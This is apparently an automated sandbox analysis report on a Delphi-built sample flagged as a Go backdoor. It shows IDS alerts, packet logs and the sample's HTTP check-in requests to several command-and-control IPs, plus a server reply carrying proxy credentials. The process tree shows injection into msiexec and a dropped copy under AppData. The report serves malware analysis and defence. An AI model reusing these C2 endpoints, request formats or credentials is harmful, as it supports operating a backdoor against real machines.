GetProfileStringW, LocalAlloc, RemoveDirectoryW, CreateEventW, GetPrivateProfileStringW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
SHFolder.dll	SHGetFolderPathW
ole32.dll	IsEqualGUID, OleInitialize, CreateStreamOnHGlobal, CLSIDFromProgID, OleUninitialize, CoInitialize, CoCreateInstance, CoUninitialize, CoTaskMemFree, CoTaskMemAlloc
gdi32.dll	Pie, EnumEnhMetaFile, SetBkMode, CreateCompatibleBitmap, GetEnhMetaFileHeader, CloseEnhMetaFile, RectVisible, AngleArc, ResizePalette, SetAbortProc, SetTextColor, StretchBlt, RoundRect, RestoreDC, SetRectRgn, GetTextMetricsW, GetWindowOrgEx, CreatePalette, CreateDCW, PolyBezierTo, CreateICW, GetStockObject, GetCharABCWidthsW, CreateSolidBrush, GetBkMode, Polygon, MoveToEx, PlayEnhMetaFile, Ellipse, StartPage, GetBitmapBits, SetTextCharacterExtra, StartDocW, AbortDoc, GetSystemPaletteEntries, GetEnhMetaFileBits, GetEnhMetaFilePaletteEntries, CreatePenIndirect, SetMapMode, GetMapMode, CreateFontIndirectW, PolyBezier, ExtCreatePen, EndDoc, GetObjectW, GetFontData, GetWinMetaFileBits, SetROP2, GetOutlineTextMetricsW, GetEnhMetaFileDescriptionW, ArcTo, CreateEnhMetaFileW, Arc, SelectPalette, ExcludeClipRect, MaskBlt, SetWindowOrgEx, EndPage, DeleteEnhMetaFile, Chord, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, GetTextMetricsA, CreateBrushIndirect, PatBlt, SetEnhMetaFileBits, GetCharABCWidthsA, Rectangle, SaveDC, DeleteDC, BitBlt, FrameRgn, GetDeviceCaps, GetTextExtentPoint32W, GetClipBox, IntersectClipRect, Polyline, CreateBitmap, SetWinMetaFileBits, CreateDIBitmap, GetStretchBltMode, CreateDIBSection, SetStretchBltMode, GetDIBits, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, SelectObject, DeleteObject, ExtFloodFill, UnrealizeObject, CopyEnhMetaFileW, SetBkColor, CreateCompatibleDC, GetObjectA, GetBrushOrgEx, GetCurrentPositionEx, SetDCPenColor, GetNearestPaletteIndex, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, GdiFlush, SetPixel, GetPolyFillMode, EnumFontFamiliesExW, StretchDIBits, GetPaletteEntries

Exports

Name	Ordinal	Address
TMethodImplementationIntercept	3	0x4e0e90
__dbk_fcall_wrapper	2	0x411be8
dbkFCallWrapperAddr	1	0x989640

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-25T08:32:51.454857+0100	2855478	ETPRO MALWARE Unknown Golang Backdoor Activity	1	192.168.2.4	49745	46.8.232.106	30001	TCP
2024-11-25T08:32:53.161229+0100	2855478	ETPRO MALWARE Unknown Golang Backdoor Activity	1	192.168.2.4	49746	46.8.236.61	30001	TCP
2024-11-25T08:32:54.707596+0100	2855478	ETPRO MALWARE Unknown Golang Backdoor Activity	1	192.168.2.4	49747	91.212.166.91	30001	TCP
2024-11-25T08:32:56.462874+0100	2855478	ETPRO MALWARE Unknown Golang Backdoor Activity	1	192.168.2.4	49749	188.130.206.243	30001	TCP
2024-11-25T08:32:58.717750+0100	2855478	ETPRO MALWARE Unknown Golang Backdoor Activity	1	192.168.2.4	49750	38.180.205.164	30001	TCP
2024-11-25T08:33:00.211444+0100	2855539	ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2	1	109.172.88.38	14206	192.168.2.4	49751	TCP
2024-11-25T08:33:00.211852+0100	2855536	ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1	1	192.168.2.4	49751	109.172.88.38	14206	TCP
2024-11-25T08:33:28.896467+0100	2855537	ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2	1	192.168.2.4	49751	109.172.88.38	14206	TCP
2024-11-25T08:33:29.364597+0100	2855538	ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1	1	109.172.88.38	14206	192.168.2.4	49751	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 08:32:49.942781925 CET	49745	30001	192.168.2.4	46.8.232.106
Nov 25, 2024 08:32:50.062540054 CET	30001	49745	46.8.232.106	192.168.2.4
Nov 25, 2024 08:32:50.062628031 CET	49745	30001	192.168.2.4	46.8.232.106
Nov 25, 2024 08:32:50.063577890 CET	49745	30001	192.168.2.4	46.8.232.106
Nov 25, 2024 08:32:50.187004089 CET	30001	49745	46.8.232.106	192.168.2.4
Nov 25, 2024 08:32:51.401817083 CET	30001	49745	46.8.232.106	192.168.2.4
Nov 25, 2024 08:32:51.454857111 CET	49745	30001	192.168.2.4	46.8.232.106
Nov 25, 2024 08:32:51.679410934 CET	49746	30001	192.168.2.4	46.8.236.61
Nov 25, 2024 08:32:51.800962925 CET	30001	49746	46.8.236.61	192.168.2.4
Nov 25, 2024 08:32:51.801028013 CET	49746	30001	192.168.2.4	46.8.236.61
Nov 25, 2024 08:32:51.801287889 CET	49746	30001	192.168.2.4	46.8.236.61
Nov 25, 2024 08:32:51.920890093 CET	30001	49746	46.8.236.61	192.168.2.4
Nov 25, 2024 08:32:53.093496084 CET	30001	49746	46.8.236.61	192.168.2.4
Nov 25, 2024 08:32:53.143989086 CET	49747	30001	192.168.2.4	91.212.166.91
Nov 25, 2024 08:32:53.161228895 CET	49746	30001	192.168.2.4	46.8.236.61
Nov 25, 2024 08:32:53.263598919 CET	30001	49747	91.212.166.91	192.168.2.4
Nov 25, 2024 08:32:53.263679028 CET	49747	30001	192.168.2.4	91.212.166.91
Nov 25, 2024 08:32:53.265106916 CET	49747	30001	192.168.2.4	91.212.166.91
Nov 25, 2024 08:32:53.384608984 CET	30001	49747	91.212.166.91	192.168.2.4
Nov 25, 2024 08:32:54.650826931 CET	30001	49747	91.212.166.91	192.168.2.4
Nov 25, 2024 08:32:54.707596064 CET	49747	30001	192.168.2.4	91.212.166.91
Nov 25, 2024 08:32:54.719232082 CET	49749	30001	192.168.2.4	188.130.206.243
Nov 25, 2024 08:32:54.838892937 CET	30001	49749	188.130.206.243	192.168.2.4
Nov 25, 2024 08:32:54.839052916 CET	49749	30001	192.168.2.4	188.130.206.243
Nov 25, 2024 08:32:54.839297056 CET	49749	30001	192.168.2.4	188.130.206.243
Nov 25, 2024 08:32:55.221343994 CET	30001	49749	188.130.206.243	192.168.2.4
Nov 25, 2024 08:32:56.394202948 CET	30001	49749	188.130.206.243	192.168.2.4
Nov 25, 2024 08:32:56.446940899 CET	49750	30001	192.168.2.4	38.180.205.164
Nov 25, 2024 08:32:56.462873936 CET	49749	30001	192.168.2.4	188.130.206.243
Nov 25, 2024 08:32:56.566566944 CET	30001	49750	38.180.205.164	192.168.2.4
Nov 25, 2024 08:32:56.570700884 CET	49750	30001	192.168.2.4	38.180.205.164
Nov 25, 2024 08:32:56.570919037 CET	49750	30001	192.168.2.4	38.180.205.164
Nov 25, 2024 08:32:56.690392971 CET	30001	49750	38.180.205.164	192.168.2.4
Nov 25, 2024 08:32:58.676878929 CET	30001	49750	38.180.205.164	192.168.2.4
Nov 25, 2024 08:32:58.686845064 CET	49749	30001	192.168.2.4	188.130.206.243
Nov 25, 2024 08:32:58.686897993 CET	49747	30001	192.168.2.4	91.212.166.91
Nov 25, 2024 08:32:58.686923981 CET	49746	30001	192.168.2.4	46.8.236.61
Nov 25, 2024 08:32:58.686954021 CET	49745	30001	192.168.2.4	46.8.232.106
Nov 25, 2024 08:32:58.717750072 CET	49750	30001	192.168.2.4	38.180.205.164
Nov 25, 2024 08:32:58.754837990 CET	49751	14206	192.168.2.4	109.172.88.38
Nov 25, 2024 08:32:58.807512999 CET	30001	49749	188.130.206.243	192.168.2.4
Nov 25, 2024 08:32:58.807558060 CET	30001	49747	91.212.166.91	192.168.2.4
Nov 25, 2024 08:32:58.807593107 CET	49749	30001	192.168.2.4	188.130.206.243
Nov 25, 2024 08:32:58.807615995 CET	49747	30001	192.168.2.4	91.212.166.91
Nov 25, 2024 08:32:58.807672024 CET	30001	49746	46.8.236.61	192.168.2.4
Nov 25, 2024 08:32:58.807702065 CET	30001	49745	46.8.232.106	192.168.2.4
Nov 25, 2024 08:32:58.807719946 CET	49746	30001	192.168.2.4	46.8.236.61
Nov 25, 2024 08:32:58.807744026 CET	49745	30001	192.168.2.4	46.8.232.106
Nov 25, 2024 08:32:58.874341011 CET	14206	49751	109.172.88.38	192.168.2.4
Nov 25, 2024 08:32:58.874432087 CET	49751	14206	192.168.2.4	109.172.88.38
Nov 25, 2024 08:33:00.211443901 CET	14206	49751	109.172.88.38	192.168.2.4
Nov 25, 2024 08:33:00.211852074 CET	49751	14206	192.168.2.4	109.172.88.38
Nov 25, 2024 08:33:00.331371069 CET	14206	49751	109.172.88.38	192.168.2.4
Nov 25, 2024 08:33:15.337438107 CET	49751	14206	192.168.2.4	109.172.88.38
Nov 25, 2024 08:33:15.456964970 CET	14206	49751	109.172.88.38	192.168.2.4
Nov 25, 2024 08:33:20.079544067 CET	14206	49751	109.172.88.38	192.168.2.4
Nov 25, 2024 08:33:20.083039045 CET	49751	14206	192.168.2.4	109.172.88.38
Nov 25, 2024 08:33:20.202866077 CET	14206	49751	109.172.88.38	192.168.2.4
Nov 25, 2024 08:33:28.677479982 CET	49750	30001	192.168.2.4	38.180.205.164
Nov 25, 2024 08:33:28.796931028 CET	30001	49750	38.180.205.164	192.168.2.4
Nov 25, 2024 08:33:28.896466970 CET	49751	14206	192.168.2.4	109.172.88.38
Nov 25, 2024 08:33:29.015911102 CET	14206	49751	109.172.88.38	192.168.2.4
Nov 25, 2024 08:33:29.364597082 CET	14206	49751	109.172.88.38	192.168.2.4
Nov 25, 2024 08:33:29.412275076 CET	49751	14206	192.168.2.4	109.172.88.38
Nov 25, 2024 08:33:40.534540892 CET	14206	49751	109.172.88.38	192.168.2.4
Nov 25, 2024 08:33:40.534809113 CET	49751	14206	192.168.2.4	109.172.88.38
Nov 25, 2024 08:33:40.654263973 CET	14206	49751	109.172.88.38	192.168.2.4
Nov 25, 2024 08:33:55.660409927 CET	49751	14206	192.168.2.4	109.172.88.38
Nov 25, 2024 08:33:55.779942036 CET	14206	49751	109.172.88.38	192.168.2.4
Nov 25, 2024 08:33:58.801058054 CET	49750	30001	192.168.2.4	38.180.205.164
Nov 25, 2024 08:33:58.920521021 CET	30001	49750	38.180.205.164	192.168.2.4
Nov 25, 2024 08:33:59.363662004 CET	49751	14206	192.168.2.4	109.172.88.38
Nov 25, 2024 08:33:59.483140945 CET	14206	49751	109.172.88.38	192.168.2.4
Nov 25, 2024 08:33:59.822377920 CET	14206	49751	109.172.88.38	192.168.2.4
Nov 25, 2024 08:33:59.869976044 CET	49751	14206	192.168.2.4	109.172.88.38
Nov 25, 2024 08:34:00.986527920 CET	14206	49751	109.172.88.38	192.168.2.4
Nov 25, 2024 08:34:00.986674070 CET	49751	14206	192.168.2.4	109.172.88.38
Nov 25, 2024 08:34:01.106168032 CET	14206	49751	109.172.88.38	192.168.2.4
Nov 25, 2024 08:34:16.113090992 CET	49751	14206	192.168.2.4	109.172.88.38
Nov 25, 2024 08:34:16.232552052 CET	14206	49751	109.172.88.38	192.168.2.4

HTTP Request Dependency Graph

46.8.232.106:30001

46.8.236.61:30001

91.212.166.91:30001

188.130.206.243:30001

38.180.205.164:30001

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49745	46.8.232.106	30001	6620	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 08:32:50.063577890 CET	290	OUT	GET /api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou HTTP/1.1 Host: 46.8.232.106:30001 User-Agent: Go-http-client/1.1 X-Api-Key: PXbyn4MO Accept-Encoding: gzip
Nov 25, 2024 08:32:51.401817083 CET	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 25 Nov 2024 07:32:51 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49746	46.8.236.61	30001	6620	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 08:32:51.801287889 CET	289	OUT	GET /api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou HTTP/1.1 Host: 46.8.236.61:30001 User-Agent: Go-http-client/1.1 X-Api-Key: OJZULM0Y Accept-Encoding: gzip
Nov 25, 2024 08:32:53.093496084 CET	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 25 Nov 2024 07:32:52 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49747	91.212.166.91	30001	6620	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 08:32:53.265106916 CET	291	OUT	GET /api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou HTTP/1.1 Host: 91.212.166.91:30001 User-Agent: Go-http-client/1.1 X-Api-Key: MeQHYhig Accept-Encoding: gzip
Nov 25, 2024 08:32:54.650826931 CET	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 25 Nov 2024 07:32:54 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49749	188.130.206.243	30001	6620	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 08:32:54.839297056 CET	293	OUT	GET /api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou HTTP/1.1 Host: 188.130.206.243:30001 User-Agent: Go-http-client/1.1 X-Api-Key: sNxZLFOr Accept-Encoding: gzip
Nov 25, 2024 08:32:56.394202948 CET	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 25 Nov 2024 07:32:56 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49750	38.180.205.164	30001	6620	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 08:32:56.570919037 CET	292	OUT	GET /api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou HTTP/1.1 Host: 38.180.205.164:30001 User-Agent: Go-http-client/1.1 X-Api-Key: jE9jRK0i Accept-Encoding: gzip
Nov 25, 2024 08:32:58.676878929 CET	1195	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:32:58 GMT Content-Length: 1076 Content-Type: text/plain; charset=utf-8 Data Raw: 31 30 39 2e 31 37 32 2e 38 38 2e 33 38 3b 31 34 32 30 36 3b 68 52 7a 31 74 4d 43 66 74 41 34 41 70 48 65 38 3a 57 73 43 2f 37 41 4b 2f 75 32 4b 34 62 34 6b 36 6c 4b 47 2e 73 69 49 38 46 6c 76 2e 68 59 49 32 5a 34 42 33 4e 71 33 32 5a 51 30 2e 30 55 76 31 46 70 76 30 51 69 50 36 53 74 6c 3a 6d 67 64 33 68 56 4a 30 34 35 6a 30 56 36 56 30 55 36 54 31 50 4e 7a 2f 6d 6b 64 61 38 61 67 70 58 6a 64 69 47 55 70 2f 44 35 48 68 67 79 50 65 43 47 73 6c 4c 33 39 70 58 4c 61 65 46 5a 71 72 58 55 61 2d 73 4f 6e 66 45 75 6d 69 63 74 74 72 42 58 43 73 78 62 5a 74 70 76 63 2d 42 70 67 72 6e 75 39 65 65 42 38 67 44 32 30 69 30 48 47 73 5a 35 41 74 41 78 48 65 64 6f 65 72 54 72 56 2c 75 57 6a 68 4a 53 68 74 56 56 65 74 44 77 56 70 53 6f 6e 3a 50 39 75 2f 65 52 6b 2f 75 53 6c 34 75 7a 47 36 49 4d 5a 2e 57 64 6d 38 79 7a 38 2e 5a 46 69 32 6c 79 31 33 37 64 61 36 79 67 6d 2e 31 30 72 36 31 46 4c 31 77 79 44 3a 35 32 42 33 74 65 49 30 48 45 49 30 6d 4e 49 30 5a 78 6d 31 63 50 75 2f 72 33 72 61 33 64 38 70 6e 72 74 69 34 [TRUNCATED] Data Ascii: 109.172.88.38;14206;hRz1tMCftA4ApHe8:WsC/7AK/u2K4b4k6lKG.siI8Flv.hYI2Z4B3Nq32ZQ0.0Uv1Fpv0QiP6Stl:mgd3hVJ045j0V6V0U6T1PNz/mkda8agpXjdiGUp/D5HhgyPeCGslL39pXLaeFZqrXUa-sOnfEumicttrBXCsxbZtpvc-Bpgrnu9eeB8gD20i0HGsZ5AtAxHedoerTrV,uWjhJShtVVetDwVpSon:P9u/eRk/uSl4uzG6IMZ.Wdm8yz8.ZFi2ly137da6ygm.10r61FL1wyD:52B3teI0HEI0mNI0Zxm1cPu/r3ra3d8pnrti4pI/nOuh7TUeL7YlP9apkqze5k6rraw-nGyfh1iiDQPrilss5NCtUMT-k8lr9f9eUl8gaQRiLAGsY4stBsxeeW0rX8p,dwohwFAtKPHtFrRpvqt:49o/fmv/u8s9fAo1WZJ.99a2SoN1DwZ25rr.Tmc1Ood6lht6RV7.zvI9kRj105Y:i823JwR03aF0qU50pUf18gY/fv1a0wHpG1wiUsS/3D0hOnEetlPl63dpR7LeffOrtQA-FoNfBS3iZigrGgyslMCtqmd-lxLrT8ieUV2gXcmirkasSE5tzBpeaVBrnfi,Dj1hqH1tJ4XtsMqpNsk:z0K/oHU/Fw21RVB8efG8Sle.hxl1u5p3cve0lmW.F162rs70hFT6tcv.0Y32i414w3F3iCr:ZPe3ZMS01tE0VEZ0MOc1zL5/JeqaS6Bp9P1iluh/fFdhfmKelEwl6jepTHjerJxrTzU-evpfyPMihXprrqrsEDhtTaD-gSNrOZGeXWKgywLi33gs41Rt4RzenZgrSyR,e28hXwrtMLMtLrYp7lr:PkW/9Ci/kJs3tcQ8Vl3.q0D1VW48jGc0Pq4.R0j2Zn40ev65tJe.JZQ1xfW6s7m42Ig:fWM3gHO0Q3f0aEC0DfX1K4R/entaLdfprl5iFhd/6VVhWgfeMAXl7NFprH1evOP [TRUNCATED]

Target ID:	0
Start time:	02:32:09
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\iKhdG3bwZK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\iKhdG3bwZK.exe"
Imagebase:	0x400000
File size:	21'120'968 bytes
MD5 hash:	044037796CF2D13EADF0217833D52E65
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:32:14
Start date:	25/11/2024
Path:	C:\Windows\SysWOW64\more.com
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\more.com
Imagebase:	0x110000
File size:	24'576 bytes
MD5 hash:	03805AE7E8CBC07840108F5C80CF4973
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:32:14
Start date:	25/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:32:41
Start date:	25/11/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\msiexec.exe
Imagebase:	0x350000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GOBackdoor, Description: Yara detected GO Backdoor, Source: 00000007.00000002.2986200286.000000000E52E000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GOBackdoor, Description: Yara detected GO Backdoor, Source: 00000007.00000002.2986200286.000000000E544000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GOBackdoor, Description: Yara detected GO Backdoor, Source: 00000007.00000002.2986200286.000000000E540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	02:32:50
Start date:	25/11/2024
Path:	C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe"
Imagebase:	0x400000
File size:	21'120'968 bytes
MD5 hash:	044037796CF2D13EADF0217833D52E65
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	29.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.4%
Total number of Nodes:	147
Total number of Limit Nodes:	7

Executed Functions

Function 0070AFA2 Relevance: 1.6, APIs: 1, Instructions: 123
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0070AF42: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 0070AF72

NtQuerySystemInformation.NTDLL(00000005,00000000,00040000,00040000), ref: 0070B006

Memory Dump Source

Source File: 00000000.00000002.1781804541.0000000000709000.00000020.00000001.01000000.00000003.sdmp, Offset: 00709000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_709000_iKhdG3bwZK.jbxd

Similarity

API ID: AllocGlobalInformationQuerySystem
String ID:
API String ID: 3737350999-0
Opcode ID: af0b5cb85ebff21ad004f17c148dcb155806cd6198d72419ed993a28eb2c6b99
Instruction ID: b06ed3a5090679260f6cea361f5e47121adf9c2401c45fd81e42d1fa462b38ff
Opcode Fuzzy Hash: af0b5cb85ebff21ad004f17c148dcb155806cd6198d72419ed993a28eb2c6b99
Instruction Fuzzy Hash: 7C51DD75E10209EFCB04DF98C890AEEB7F5BF58300F208659E915A7381D779AE41CBA1

Function 0070A882 Relevance: 4.6, APIs: 3, Instructions: 79
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,?), ref: 0070A8A4

Memory Dump Source

Source File: 00000000.00000002.1781804541.0000000000709000.00000020.00000001.01000000.00000003.sdmp, Offset: 00709000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_709000_iKhdG3bwZK.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f2ed564a57136dcdfd9afc14d4280a279a6561515fd8f8e06747ede3fd6620df
Instruction ID: af934c206a0094e205b3ae63a816cde90bead77c35c851e781f660c9745c9f71
Opcode Fuzzy Hash: f2ed564a57136dcdfd9afc14d4280a279a6561515fd8f8e06747ede3fd6620df
Instruction Fuzzy Hash: D731CE75A00208FFCB04DF98C881F9EB7B9EF48310F20C298E919AB391D675AE41DB50

Function 0070B6C2 Relevance: 4.0, APIs: 2, Instructions: 995
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0070AF42: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 0070AF72

Part of subcall function 0070A4B2: LoadLibraryW.KERNELBASE(?), ref: 0070A4E3

VirtualProtect.KERNELBASE(?,00000000,?,00000000), ref: 0070C297
VirtualProtect.KERNELBASE(?,00000000,00000000,00000000), ref: 0070C2CA

Memory Dump Source

Source File: 00000000.00000002.1781804541.0000000000709000.00000020.00000001.01000000.00000003.sdmp, Offset: 00709000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_709000_iKhdG3bwZK.jbxd

Similarity

API ID: ProtectVirtual$AllocGlobalLibraryLoad
String ID:
API String ID: 2510009449-0
Opcode ID: 12cd21608a8ffc2380a32fe6fd1c4dfdad82edcd5fa0718e4e7579e87a8b5082
Instruction ID: 6828f4dbac52e5fb711e07ce1440fd4f641dc0d0878df5b1a527fe1b09698ab8
Opcode Fuzzy Hash: 12cd21608a8ffc2380a32fe6fd1c4dfdad82edcd5fa0718e4e7579e87a8b5082
Instruction Fuzzy Hash: F792B4B6E00218EFCB14DF98D991EEEB7B5BF98300F148298E509A7341E635AE45CF51

Function 0070AE72 Relevance: 3.0, APIs: 2, Instructions: 50
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0070AE94
WriteFile.KERNELBASE(000000FF,00000000,?,00000000,00000000), ref: 0070AEC2

Memory Dump Source

Source File: 00000000.00000002.1781804541.0000000000709000.00000020.00000001.01000000.00000003.sdmp, Offset: 00709000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_709000_iKhdG3bwZK.jbxd

Similarity

API ID: File$CreateWrite
String ID:
API String ID: 2263783195-0
Opcode ID: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
Instruction ID: 4879f55ace3d0c8a4e9e9892da35f6326331e8f4f0a8dbecfc8cd06c44723555
Opcode Fuzzy Hash: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
Instruction Fuzzy Hash: A8010075640208FBDB10DE58CD42F9EB3B9AF98314F20C254FA189B2D1D631EE02DB91

Function 0070A4B2 Relevance: 1.5, APIs: 1, Instructions: 25
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0070AF42: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 0070AF72

LoadLibraryW.KERNELBASE(?), ref: 0070A4E3

Memory Dump Source

Source File: 00000000.00000002.1781804541.0000000000709000.00000020.00000001.01000000.00000003.sdmp, Offset: 00709000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_709000_iKhdG3bwZK.jbxd

Similarity

API ID: AllocGlobalLibraryLoad
String ID:
API String ID: 3361179946-0
Opcode ID: f0635a325a859858965f79386bc2292b2c6fb1dc49c835a5e9fb86d575d4b663
Instruction ID: d3596bb7cc851b4e0f92be84d4f48b8e268f2cea070f1e8caf4b81b370f54b71
Opcode Fuzzy Hash: f0635a325a859858965f79386bc2292b2c6fb1dc49c835a5e9fb86d575d4b663
Instruction Fuzzy Hash: 84E0C9B5A00208FBCB40EFA8D982A9D7BB8AB58201F108194F90897340E635EE158B91

Function 0070C4D2 Relevance: 1.5, APIs: 1, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1781804541.0000000000709000.00000020.00000001.01000000.00000003.sdmp, Offset: 00709000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_709000_iKhdG3bwZK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
Instruction ID: ba886b3d7e4bef73f4b9b9eb82985ecaf6b5c0ffac5f7dc9389e1c1d4969f07f
Opcode Fuzzy Hash: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
Instruction Fuzzy Hash: 4191DA75D04209EFCB08CF98D891AEEBBF5BF88300F148659E515AB391D735AA45CFA0

Function 0070AF42 Relevance: 1.3, APIs: 1, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 0070AF72

Memory Dump Source

Source File: 00000000.00000002.1781804541.0000000000709000.00000020.00000001.01000000.00000003.sdmp, Offset: 00709000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_709000_iKhdG3bwZK.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
